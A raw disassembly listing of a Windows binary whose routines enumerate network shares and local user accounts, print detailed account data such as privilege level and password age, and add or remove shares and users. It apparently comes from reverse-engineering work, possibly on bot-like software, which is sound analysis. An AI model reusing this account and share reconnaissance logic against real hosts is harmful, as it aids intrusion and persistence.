cmp edi, [ebp+var_4]
jl loc_40DA36
loc_40DAD0: ; CODE XREF: sub_40D9B3+77�j
cmp [ebp+var_8], ebx
jnz loc_40D9EB
loc_40DAD9: ; CODE XREF: sub_40D9B3+6C�j
push [ebp+var_C]
call ds:dword_43F56C ; CloseServiceHandle
xor eax, eax
pop edi
cmp eax, [ebp+var_4]
pop esi
pop ebx
sbb eax, eax
neg eax
leave
retn
sub_40D9B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DAF0 proc near ; CODE XREF: sub_40EE72:loc_410FB4�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
test edi, edi
jz loc_40DB8A
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, 0
jz short loc_40DB19
dec eax
jnz short loc_40DB6A
push edi
push 0
call sub_40DCC3
pop ecx
pop ecx
jmp short loc_40DB66
; ---------------------------------------------------------------------------
loc_40DB19: ; CODE XREF: sub_40DAF0+18�j
cmp [ebp+arg_8], 0
jnz short loc_40DB58
push 24h
push edi
call sub_418F50
pop ecx
test eax, eax
pop ecx
jnz short loc_40DB58
push 57h
pop eax
loc_40DB30: ; CODE XREF: sub_40DAF0+78�j
push eax
call sub_40E4B7
pop ecx
push eax
lea eax, [esi+esi*2]
push edi
mov esi, offset dword_443D34
push ds:off_42E7A0[eax*4]
push offset dword_42EE98
push esi
call sub_4172AE
add esp, 14h
jmp short loc_40DBAA
; ---------------------------------------------------------------------------
loc_40DB58: ; CODE XREF: sub_40DAF0+2D�j
; sub_40DAF0+3B�j
push [ebp+arg_8]
push edi
push 0
call sub_40DC17
add esp, 0Ch
loc_40DB66: ; CODE XREF: sub_40DAF0+27�j
test eax, eax
jnz short loc_40DB30
loc_40DB6A: ; CODE XREF: sub_40DAF0+1B�j
lea eax, [esi+esi*2]
push edi
mov esi, offset dword_443D34
push ds:off_42E7A4[eax*4]
push offset dword_42EE6C
push esi
call sub_4172AE
add esp, 10h
jmp short loc_40DBAA
; ---------------------------------------------------------------------------
loc_40DB8A: ; CODE XREF: sub_40DAF0+A�j
mov eax, [ebp+arg_0]
mov esi, offset dword_443D34
lea eax, [eax+eax*2]
push ds:off_42E7A0[eax*4]
push offset dword_42EE38
push esi
call sub_4172AE
add esp, 0Ch
loc_40DBAA: ; CODE XREF: sub_40DAF0+66�j
; sub_40DAF0+98�j
mov eax, esi
pop edi
pop esi
pop ebp
retn
sub_40DAF0 endp
; =============== S U B R O U T I N E =======================================
sub_40DBB0 proc near ; CODE XREF: sub_415F86+245�p
arg_0 = dword ptr 4
arg_C = dword ptr 10h
push esi
xor esi, esi
cmp [esp+4+arg_0], esi
jnz short loc_40DBBD
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40DBBD: ; CODE XREF: sub_40DBB0+7�j
push ebx
push ebp
push edi
push esi
push esi
push esi
mov edi, ds:dword_424150
push esi
push 0FFFFFFFFh
mov ebx, 400h
push [esp+24h+arg_0]
push ebx
push esi
call edi ; WideCharToMultiByte
test ds:byte_443F34, 1
mov ebp, eax
jnz short loc_40DBFA
or ds:byte_443F34, 1
lea eax, [ebp+1]
push eax
call sub_4185F5
pop ecx
mov ds:dword_443CD4, eax
loc_40DBFA: ; CODE XREF: sub_40DBB0+32�j
push esi
push esi
push ebp
push ds:dword_443CD4
push 0FFFFFFFFh
push [esp+18h+arg_C]
push ebx
push esi
call edi ; WideCharToMultiByte
mov eax, ds:dword_443CD4
pop edi
pop ebp
pop ebx
pop esi
retn
sub_40DBB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DC17 proc near ; CODE XREF: sub_40DAF0+6E�p
; sub_4162AA+18A�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push edi
push [ebp+arg_0]
call sub_40DC82
push [ebp+arg_4]
mov edi, eax
call sub_40DC82
push 24h
mov [ebp+var_20], eax
push [ebp+arg_4]
call sub_418F50
push [ebp+arg_8]
mov [ebp+var_14], 7Fh
neg eax
sbb eax, eax
and [ebp+var_18], 0
or [ebp+var_10], 0FFFFFFFFh
and [ebp+var_C], 0
and eax, 80000000h
mov [ebp+var_1C], eax
call sub_40DC82
add esp, 14h
mov [ebp+var_8], eax
and [ebp+var_4], 0
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_20]
push eax
push 2
push edi
call ds:dword_43F568
pop edi
leave
retn
sub_40DC17 endp
; =============== S U B R O U T I N E =======================================
sub_40DC82 proc near ; CODE XREF: sub_40DC17+A�p
; sub_40DC17+14�p ...
arg_0 = dword ptr 4
push ebp
mov ebp, [esp+4+arg_0]
xor eax, eax
cmp ebp, eax
jnz short loc_40DC8F
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40DC8F: ; CODE XREF: sub_40DC82+9�j
push ebx
push esi
mov esi, ds:dword_424070
push edi
push eax
push eax
push 0FFFFFFFFh
push ebp
push 1
push eax
call esi ; MultiByteToWideChar
mov edi, eax
lea eax, [edi+edi+2]
push eax
call sub_4185F5
pop ecx
mov ebx, eax
push edi
push ebx
push 0FFFFFFFFh
push ebp
push 1
push 0
call esi ; MultiByteToWideChar
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn
sub_40DC82 endp
; =============== S U B R O U T I N E =======================================
sub_40DCC3 proc near ; CODE XREF: sub_40DAF0+20�p
; sub_415F86+1BB�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_40DC82
push [esp+8+arg_4]
mov esi, eax
call sub_40DC82
pop ecx
pop ecx
push 0
push eax
push esi
call ds:dword_43F540
pop esi
retn
sub_40DCC3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DCE6 proc near ; CODE XREF: sub_40EE72+2169�p
var_210 = byte ptr -210h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push ebx
push esi
push edi
push [ebp+arg_C]
call sub_40DC82
xor esi, esi
mov [ebp+var_C], eax
push esi
mov [ebp+arg_C], esi
push [ebp+arg_8]
mov [ebp+var_8], esi
mov [ebp+var_10], esi
push offset aShareNameResou ; "Share name: Resource: "...
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 18h
loc_40DD1F: ; CODE XREF: sub_40DCE6+10F�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_4]
push 0FFFFFFFFh
push eax
push 1F6h
push [ebp+var_C]
call ds:dword_43F5B4
mov ebx, eax
cmp ebx, esi
jz short loc_40DD82
cmp ebx, 0EAh
jz short loc_40DD82
push ebx
push ebx
call sub_40E4B7
pop ecx
push eax
lea eax, [ebp+var_210]
push offset dword_42EEF4
push eax
call sub_4172AE
push esi
lea eax, [ebp+var_210]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 24h
jmp short loc_40DDEF
; ---------------------------------------------------------------------------
loc_40DD82: ; CODE XREF: sub_40DCE6+5D�j
; sub_40DCE6+65�j
push 1
pop edi
cmp [ebp+arg_C], edi
jb short loc_40DDE6
mov eax, [ebp+var_4]
lea esi, [eax+14h]
loc_40DD90: ; CODE XREF: sub_40DCE6+FC�j
push dword ptr [esi+10h]
call ds:dword_43F55C ; IsValidSecurityDescriptor
test eax, eax
mov eax, offset aYes ; "Yes"
jnz short loc_40DDA7
mov eax, offset aNo ; "No"
loc_40DDA7: ; CODE XREF: sub_40DCE6+BA�j
push eax
lea eax, [ebp+var_210]
push dword ptr [esi]
push dword ptr [esi+4]
push dword ptr [esi-14h]
push offset a14s24s6u4s ; "%-14S %-24S %-6u %-4s"
push eax
call sub_4172AE
push 1
lea eax, [ebp+var_210]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 2Ch
add esi, 28h
inc edi
cmp edi, [ebp+arg_C]
jbe short loc_40DD90
xor esi, esi
loc_40DDE6: ; CODE XREF: sub_40DCE6+A2�j
push [ebp+var_4]
call ds:dword_43F6F8
loc_40DDEF: ; CODE XREF: sub_40DCE6+9A�j
cmp ebx, 0EAh
jz loc_40DD1F
xor eax, eax
cmp ebx, esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_40DCE6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DE07 proc near ; CODE XREF: sub_40EE72:loc_411047�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
cmp ebx, edi
jz loc_40DEAC
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, edi
jz short loc_40DE49
dec eax
jz short loc_40DE3E
dec eax
jnz short loc_40DE64
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push ebx
push edi
call sub_40DF4E
add esp, 14h
jmp short loc_40DE60
; ---------------------------------------------------------------------------
loc_40DE3E: ; CODE XREF: sub_40DE07+1D�j
push ebx
push edi
call sub_40DF2D
pop ecx
pop ecx
jmp short loc_40DE60
; ---------------------------------------------------------------------------
loc_40DE49: ; CODE XREF: sub_40DE07+1A�j
cmp [ebp+arg_8], edi
jz short loc_40DE5D
push [ebp+arg_8]
push ebx
push edi
call sub_40DED3
add esp, 0Ch
jmp short loc_40DE60
; ---------------------------------------------------------------------------
loc_40DE5D: ; CODE XREF: sub_40DE07+45�j
push 57h
pop eax
loc_40DE60: ; CODE XREF: sub_40DE07+35�j
; sub_40DE07+40�j ...
cmp eax, edi
jnz short loc_40DE84
loc_40DE64: ; CODE XREF: sub_40DE07+20�j
lea eax, [esi+esi*2]
push ebx
mov esi, offset dword_443F38
push ds:off_42E7A4[eax*4]
push offset dword_42EFD8
push esi
call sub_4172AE
add esp, 10h
jmp short loc_40DECC
; ---------------------------------------------------------------------------
loc_40DE84: ; CODE XREF: sub_40DE07+5B�j
push eax
call sub_40E4B7
pop ecx
push eax
lea eax, [esi+esi*2]
push ebx
mov esi, offset dword_443F38
push ds:off_42E7A0[eax*4]
push offset dword_42EF9C
push esi
call sub_4172AE
add esp, 14h
jmp short loc_40DECC
; ---------------------------------------------------------------------------
loc_40DEAC: ; CODE XREF: sub_40DE07+D�j
mov eax, [ebp+arg_0]
mov esi, offset dword_443F38
lea eax, [eax+eax*2]
push ds:off_42E7A0[eax*4]
push offset dword_42EF64
push esi
call sub_4172AE
add esp, 0Ch
loc_40DECC: ; CODE XREF: sub_40DE07+7B�j
; sub_40DE07+A3�j
mov eax, esi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40DE07 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DED3 proc near ; CODE XREF: sub_40DE07+4C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
and [ebp+var_4], 0
push edi
push [ebp+arg_0]
call sub_40DC82
push [ebp+arg_4]
mov edi, eax
call sub_40DC82
push [ebp+arg_8]
mov [ebp+var_24], eax
call sub_40DC82
add esp, 0Ch
mov [ebp+var_20], eax
and [ebp+var_14], 0
and [ebp+var_10], 0
push 1
and [ebp+var_8], 0
pop eax
lea ecx, [ebp+var_4]
push ecx
lea ecx, [ebp+var_24]
push ecx
push eax
push edi
mov [ebp+var_18], eax
mov [ebp+var_C], 10001h
call ds:dword_43F54C
pop edi
leave
retn
sub_40DED3 endp
; =============== S U B R O U T I N E =======================================
sub_40DF2D proc near ; CODE XREF: sub_40DE07+39�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_40DC82
push [esp+8+arg_4]
mov esi, eax
call sub_40DC82
pop ecx
pop ecx
push eax
push esi
call ds:dword_43F53C
pop esi
retn
sub_40DF2D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DF4E proc near ; CODE XREF: sub_40DE07+2D�p
var_204 = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 204h
and [ebp+var_4], 0
push esi
push [ebp+arg_0]
call sub_40DC82
push [ebp+arg_4]
mov esi, eax
call sub_40DC82
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push 0Bh
push eax
push esi
call ds:dword_43F6C0
test eax, eax
mov [ebp+arg_0], eax
jnz loc_40E2F6
mov eax, [ebp+var_4]
test eax, eax
jz loc_40E331
push ebx
push edi
push dword ptr [eax]
lea eax, [ebp+var_204]
push offset aAccountS ; "Account: %S"
push eax
call sub_4172AE
mov esi, [ebp+arg_10]
mov edi, [ebp+arg_C]
mov ebx, [ebp+arg_8]
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+0Ch]
lea eax, [ebp+var_204]
push offset aFullNameS ; "Full Name: %S"
push eax
call sub_4172AE
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+8]
lea eax, [ebp+var_204]
push offset aUserCommentS ; "User Comment: %S"
push eax
call sub_4172AE
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+4]
lea eax, [ebp+var_204]
push offset aCommentS ; "Comment: %S"
push eax
call sub_4172AE
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
mov eax, [eax+10h]
sub eax, 0
jz short loc_40E06D
dec eax
jz short loc_40E066
dec eax
jz short loc_40E05F
mov eax, offset aUnknown_0 ; "Unknown"
jmp short loc_40E072
; ---------------------------------------------------------------------------
loc_40E05F: ; CODE XREF: sub_40DF4E+108�j
mov eax, offset aAdministrator ; "Administrator"
jmp short loc_40E072
; ---------------------------------------------------------------------------
loc_40E066: ; CODE XREF: sub_40DF4E+105�j
mov eax, offset aUser_1 ; "User"
jmp short loc_40E072
; ---------------------------------------------------------------------------
loc_40E06D: ; CODE XREF: sub_40DF4E+102�j
mov eax, offset aGuest ; "Guest"
loc_40E072: ; CODE XREF: sub_40DF4E+10F�j
; sub_40DF4E+116�j ...
push eax
lea eax, [ebp+var_204]
push offset aPrivilegeLevel ; "Privilege Level: %s"
push eax
call sub_4172AE
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+14h]
lea eax, [ebp+var_204]
push offset aAuthFlagsD ; "Auth Flags: %d"
push eax
call sub_4172AE
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+1Ch]
lea eax, [ebp+var_204]
push offset aHomeDirectoryS ; "Home Directory: %S"
push eax
call sub_4172AE
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+20h]
lea eax, [ebp+var_204]
push offset aParametersS ; "Parameters: %S"
push eax
call sub_4172AE
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+18h]
lea eax, [ebp+var_204]
push offset aPasswordAgeD ; "Password Age: %d"
push eax
call sub_4172AE
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+2Ch]
lea eax, [ebp+var_204]
push offset aBadPasswordCou ; "Bad Password Count: %d"
push eax
call sub_4172AE
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+30h]
lea eax, [ebp+var_204]
push offset aNumberOfLogins ; "Number of Logins: %d"
push eax
call sub_4172AE
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+24h]
lea eax, [ebp+var_204]
push offset aLastLogonD ; "Last Logon: %d"
push eax
call sub_4172AE
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+28h]
lea eax, [ebp+var_204]
push offset aLastLogoffD ; "Last Logoff: %d"
push eax
call sub_4172AE
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+34h]
lea eax, [ebp+var_204]
push offset aLogonServerS ; "Logon Server: %S"
push eax
call sub_4172AE
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+3Ch]
lea eax, [ebp+var_204]
push offset aWorkstationsS ; "Workstations: %S"
push eax
call sub_4172AE
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+38h]
lea eax, [ebp+var_204]
push offset aCountryCodeD ; "Country Code: %d"
push eax
call sub_4172AE
push 1
push esi
lea eax, [ebp+var_204]
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+4Ch]
lea eax, [ebp+var_204]
push offset aUserSLanguageD ; "User's Language: %d"
push eax
call sub_4172AE
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+40h]
lea eax, [ebp+var_204]
push offset aMax_StorageD ; "Max. Storage: %d"
push eax
call sub_4172AE
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+44h]
lea eax, [ebp+var_204]
push offset aUnitsPerWeekD ; "Units Per Week: %d"
push eax
call sub_4172AE
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
add esp, 20h
pop edi
pop ebx
jmp short loc_40E322
; ---------------------------------------------------------------------------
loc_40E2F6: ; CODE XREF: sub_40DF4E+35�j
push eax
lea eax, [ebp+var_204]
push offset dword_42F008
push eax
call sub_4172AE
push 0
lea eax, [ebp+var_204]
push [ebp+arg_10]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
call sub_40D679
add esp, 20h
loc_40E322: ; CODE XREF: sub_40DF4E+3A6�j
cmp [ebp+var_4], 0
jz short loc_40E331
push [ebp+var_4]
call ds:dword_43F6F8
loc_40E331: ; CODE XREF: sub_40DF4E+40�j
; sub_40DF4E+3D8�j
mov eax, [ebp+arg_0]
pop esi
leave
retn
sub_40DF4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E337 proc near ; CODE XREF: sub_40EE72+21F2�p
var_218 = byte ptr -218h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 218h
push ebx
push esi
push edi
xor esi, esi
push [ebp+arg_C]
mov [ebp+var_4], esi
call sub_40DC82
push esi
mov [ebp+var_14], eax
push [ebp+arg_8]
mov [ebp+arg_C], esi
mov [ebp+var_18], esi
mov [ebp+var_10], esi
push offset aUsernameAccoun ; "Username accounts for local system:"
mov [ebp+var_8], esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 18h
loc_40E376: ; CODE XREF: sub_40E337+135�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_4]
push 0FFFFFFFFh
push eax
push 2
push esi
push [ebp+var_14]
call ds:dword_43F5D0
cmp eax, esi
mov [ebp+var_C], eax
jz short loc_40E3D7
cmp eax, 0EAh
jz short loc_40E3D7
push eax
push eax
call sub_40E4B7
pop ecx
push eax
lea eax, [ebp+var_218]
push offset dword_42F218
push eax
call sub_4172AE
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 24h
jmp short loc_40E452
; ---------------------------------------------------------------------------
loc_40E3D7: ; CODE XREF: sub_40E337+62�j
; sub_40E337+69�j
mov edi, [ebp+var_4]
cmp edi, esi
jz loc_40E465
xor ebx, ebx
cmp [ebp+arg_C], esi
jbe short loc_40E452
loc_40E3E9: ; CODE XREF: sub_40E337+ED�j
cmp edi, esi
jz short loc_40E428
push dword ptr [edi]
lea eax, [ebp+var_218]
push offset aS_6 ; " %S"
push eax
call sub_4172AE
push 1
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 20h
add edi, 4
inc [ebp+var_8]
inc ebx
cmp ebx, [ebp+arg_C]
jb short loc_40E3E9
jmp short loc_40E452
; ---------------------------------------------------------------------------
loc_40E428: ; CODE XREF: sub_40E337+B4�j
lea eax, [ebp+var_218]
push offset dword_42F1D4
push eax
call sub_4172AE
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 1Ch
loc_40E452: ; CODE XREF: sub_40E337+9E�j
; sub_40E337+B0�j ...
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_40E465
push edi
call ds:dword_43F6F8
xor edi, edi
mov [ebp+var_4], edi
loc_40E465: ; CODE XREF: sub_40E337+A5�j
; sub_40E337+120�j
cmp [ebp+var_C], 0EAh
jz loc_40E376
cmp edi, esi
jz short loc_40E47D
push edi
call ds:dword_43F6F8
loc_40E47D: ; CODE XREF: sub_40E337+13D�j
push [ebp+var_8]
lea eax, [ebp+var_218]
push offset aTotalUsersFoun ; "Total users found: %d."
push eax
call sub_4172AE
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 20h
xor eax, eax
cmp [ebp+var_C], esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_40E337 endp
; =============== S U B R O U T I N E =======================================
sub_40E4B7 proc near ; CODE XREF: sub_40DAF0+41�p
; sub_40DCE6+69�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 858h
cmp eax, ecx
ja loc_40E569
jz loc_40E562
cmp eax, 7Bh
ja short loc_40E52E
jz short loc_40E524
cmp eax, 5
jz short loc_40E51A
cmp eax, 8
jz short loc_40E510
cmp eax, 32h
jz short loc_40E506
cmp eax, 35h
jz short loc_40E4FC
cmp eax, 57h
jnz loc_40E5B8
push offset aInvalidParamet ; "Invalid parameter."
jmp loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E4FC: ; CODE XREF: sub_40E4B7+30�j
push offset aServerNameNotF ; "Server name not found."
jmp loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E506: ; CODE XREF: sub_40E4B7+2B�j
push offset aThisNetworkReq ; "This network request is not supported."
jmp loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E510: ; CODE XREF: sub_40E4B7+26�j
push offset aNotEnoughMemor ; "Not enough memory."
jmp loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E51A: ; CODE XREF: sub_40E4B7+21�j
push offset aAccessDenied_ ; "Access denied."
jmp loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E524: ; CODE XREF: sub_40E4B7+1C�j
push offset aTheNameIsInval ; "The name is invalid."
jmp loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E52E: ; CODE XREF: sub_40E4B7+1A�j
sub eax, 7Ch
jz short loc_40E55B
sub eax, 7C8h
jz short loc_40E554
dec eax
jz short loc_40E54A
dec eax
jnz short loc_40E5B8
push offset aDuplicateShare ; "Duplicate share name."
jmp loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E54A: ; CODE XREF: sub_40E4B7+84�j
push offset aInvalidForRedi ; "Invalid for redirected resource."
jmp loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E554: ; CODE XREF: sub_40E4B7+81�j
push offset aDeviceOrDirect ; "Device or directory does not exist."
jmp short loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E55B: ; CODE XREF: sub_40E4B7+7A�j
push offset aLevelParameter ; "Level parameter is invalid."
jmp short loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E562: ; CODE XREF: sub_40E4B7+11�j
push offset aAGeneralFailur ; "A general failure occurred in the netwo"...
jmp short loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E569: ; CODE XREF: sub_40E4B7+B�j
mov ecx, 8C5h
cmp eax, ecx
ja short loc_40E5A2
jz short loc_40E59B
sub eax, 8ADh
jz short loc_40E5CD
dec eax
dec eax
jz short loc_40E594
dec eax
jz short loc_40E58D
dec eax
dec eax
jnz short loc_40E5B8
push offset aTheOperationIs ; "The operation is allowed only on the pr"...
jmp short loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E58D: ; CODE XREF: sub_40E4B7+C9�j
push offset aTheUserAccount ; "The user account already exists."
jmp short loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E594: ; CODE XREF: sub_40E4B7+C6�j
push offset aTheGroupAlread ; "The group already exists."
jmp short loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E59B: ; CODE XREF: sub_40E4B7+BB�j
push offset aThePasswordIsS ; "The password is shorter than required ("...
jmp short loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E5A2: ; CODE XREF: sub_40E4B7+B9�j
sub eax, 8CAh
jz short loc_40E5D4
sub eax, 17h
jz short loc_40E5CD
sub eax, 25h
jz short loc_40E5C6
sub eax, 29h
jz short loc_40E5BF
loc_40E5B8: ; CODE XREF: sub_40E4B7+35�j
; sub_40E4B7+87�j ...
push offset aAnUnknownError ; "An unknown error occurred."
jmp short loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E5BF: ; CODE XREF: sub_40E4B7+FF�j
push offset aTheComputerNam ; "The computer name is invalid."
jmp short loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E5C6: ; CODE XREF: sub_40E4B7+FA�j
push offset aShareNotFound_ ; "Share not found."
jmp short loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E5CD: ; CODE XREF: sub_40E4B7+C2�j
; sub_40E4B7+F5�j
push offset aTheUserNameCou ; "The user name could not be found."
jmp short loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E5D4: ; CODE XREF: sub_40E4B7+F0�j
push offset aNetworkConnect ; "Network connection not found."
loc_40E5D9: ; CODE XREF: sub_40E4B7+40�j
; sub_40E4B7+4A�j ...
push offset dword_443CD8
call sub_4172AE
pop ecx
mov eax, offset dword_443CD8
pop ecx
retn
sub_40E4B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E5EB proc near ; CODE XREF: sub_40EE72+2231�p
var_718 = byte ptr -718h
var_318 = byte ptr -318h
var_108 = byte ptr -108h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 718h
push esi
push 200h
push [ebp+arg_0]
lea eax, [ebp+var_718]
push eax
call sub_4199B9
add esp, 0Ch
lea eax, [ebp+arg_0]
mov esi, 108h
push eax
lea eax, [ebp+var_108]
push eax
mov [ebp+arg_0], esi
call ds:dword_424154 ; GetComputerNameA
lea eax, [ebp+var_108]
push esi
push eax
lea eax, [ebp+var_318]
push eax
call sub_4199B9
lea eax, [ebp+var_718]
push eax
call sub_41999C
add esp, 10h
shl eax, 1
push eax
lea eax, [ebp+var_718]
push eax
lea eax, [ebp+var_318]
push 0
push eax
push 0
call ds:dword_43F678
test eax, eax
jnz short loc_40E67B
mov esi, offset dword_443AD4
push offset dword_42F568
push esi
call sub_4172AE
pop ecx
pop ecx
jmp short loc_40E6A4
; ---------------------------------------------------------------------------
loc_40E67B: ; CODE XREF: sub_40E5EB+7A�j
lea ecx, [ebp+var_718]
push ecx
lea ecx, [ebp+var_318]
push ecx
push eax
call sub_40E4B7
pop ecx
mov esi, offset dword_443AD4
push eax
push offset dword_42F530
push esi
call sub_4172AE
add esp, 14h
loc_40E6A4: ; CODE XREF: sub_40E5EB+8E�j
mov eax, esi
pop esi
leave
retn
sub_40E5EB endp
